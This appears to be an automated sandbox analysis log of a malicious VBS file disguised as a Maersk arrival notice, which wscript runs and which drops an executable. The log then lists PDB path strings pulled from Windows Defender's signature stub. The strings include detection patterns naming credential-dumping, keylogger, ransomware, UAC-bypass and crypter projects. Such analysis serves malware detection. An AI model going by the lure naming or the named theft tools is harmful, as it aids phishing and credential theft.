Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B57CB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs'

Source: Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs

ReversingLabs: Detection: 13%

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Jump to behavior

Source:	Binary string: ASAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: \Release\runner.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: oyvmhvtgei\bmjc\fee.pdb source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp
Source:	Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: main\payload\payload.x86.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: CFy92ROzKls\ro\HwtAF.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp
Source:	Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp
Source:	Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\binplace.exe source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp
Source:	Binary string: msmdsrv.pdb source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp
Source:	Binary string: he#@1.Pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: heerhWHW#@1wHJnERbRW.Pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: \Release\gogodele.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 0\Adobe Reader.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: \bin\DownloaderExe.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: SpeedNewASK\Debug\spdfrmon.pdb source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: \i386\iSafeKrnlR3.pdb source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp
Source:	Binary string: sctasks.pdbd source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp
Source:	Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: g711codc.pdb3 source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: reg.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: Ransomware.pdbxN source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: \x64\release\shell.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb~ source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: mgr.pdb source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp
Source:	Binary string: \Release\ComBroadcaster.pdb source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp
Source:	Binary string: b-- b3: bs: bue b1f bss b5+(b---b51-b74-bd6-bf8-bbf-ban-bot-bne.bog.bck.bpk.bm.bup.b.s.but.be /be10b420b180bc01bd31bb91b2c1b-b2b6f2b443b683b7-4bd-4by24b994b8a4b,c4b0c4b{65bd85b-95bfa5bgg5b5j5bd96b2c6bhv6be-7b207bf27b-47b077be87b1a7b4f7b528bi38b478b-88b5-9b7f9b3n9but:bg,?bhi_btn_bio_bro_bbs_bet_b: ab86abs_ab-aab5babgbab.cabadabrdabffabciabgrab[tabstab{tabiuab.wab/wab1-bbc-bb59bb89bbjabbffbbtgbb#jbbcobbcsbbbubb26cba8cb4bcb6ecb4fcbyhcbdmcbcpcbipcb-tcb.db</dbe0db27dbpadbbbdbccdb\ddbbddb6edbmodboodb.pdbrrdb-4ebhbeb\debhgebehebtiebklebulebomebjoeb.rebirebprebosebrvebrwebmzeb source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp
Source:	Binary string: bot.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: comp.pdbd source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: \Dolphin.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: 'C:\postmaster\merge\Peasants\Billy.pdb] source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: c:\Documents and Settings\Administrator\My Documents\Visual Studio Projects\EASZZCDFR\Release\EASZZCDFR.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: -C:\backward\inch\enumeration\Atmel\neces.pdb source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: KF.+:\\Projects\\Crypt\\Stub2005\\Stub2005\\Stub\\Stub\\Release\\.*.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: Ivan\Documents\generic_exe\Release\BHO.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: \CCC\obj\Debug\CCC.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb] source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: EC:\Projects\Docwize\cUniFunctions\obj\DocwizeClient\cUniFunctions.pdbx source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: .+:\\src\\tcrypt\\Release\\s_(high\|low).pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-io-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: WanNengWB\WBUpd32.pdb source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: CryptoService.pdb source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: Asource\repos\Coronavirus1\Coronavirus1\obj\Debug\Coronavirus1.pdb] source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp
Source:	Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: $\Season\Wife_low\531\Quart\table.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: \Sample\Release\CNetworking.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: OC:\Users\hoogle168\Desktop\2008Projects\NewCoreCtrl08\Release\NewCoreCtrl08.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \mywscript.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: \Release\MyEncrypter2.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: 7h4qMQ1edvEOY+wQIOdVR_v.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: 0.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: R,\\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdbx source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: costura.injectordll.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: cleanmgr.pdbPE source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: wRHWRH@4hjethwehgw.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdba~ source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: \[Release.Win32]Clicker.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: C:\SuccWare\SuccWare\obj\Debug\SuccWare.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: wajam_goblin.pdb source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp
Source:	Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp
Source:	Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp
Source:	Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-registry-l1-1-0.pdb<b`- source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-com-l1-1-0.pdb' source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: GCWYq1g.pdb source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp
Source:	Binary string: mfcsubs.pdb source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!%WINDIR%\Microsoft.NET\mscorsvw.exe source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: mshta.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: BTR.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: D:\developement\projects\flood_load\Release\flood_load.pdb source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: PROZIPPER.pdb source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: ddraw.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: GPDFDocument.pdb source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp
Source:	Binary string: wbadmin.pdb source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp
Source:	Binary string: *\ClientPlugin\obj\Release\ClientPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: Unite.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: z:\Projects\Rescator\uploader\Debug\scheck.pdb] source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp
Source:	Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp
Source:	Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: Flipopia.pdb source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp
Source:	Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: Users\Legion\source\repos\curl\Release\curl.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: S\\server\\V.\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \x64\Release\Narrator.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdbxc source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: rasautou.pdb source: MpSigStub.exe, 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp
Source:	Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: 9D:\BuildScript.NET\c2patchdx11\pc\Build\Bin32\Crysis2.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: BugTrap.pdb] source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp
Source:	Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp
Source:	Binary string: dxtrans.pdb source: MpSigStub.exe, 00000026.00000003.18290876432.00000138BE187000.00000004.00000001.sdmp
Source:	Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdb source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: fc.pdb0 source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp
Source:	Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: 4\ValhallaCrypter\ValhallaStub\Debug\ValhallaStub.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: EFRE65.pdb source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: CryARr.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: SAVService.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: 7laIR+\|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: wevtutil.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp
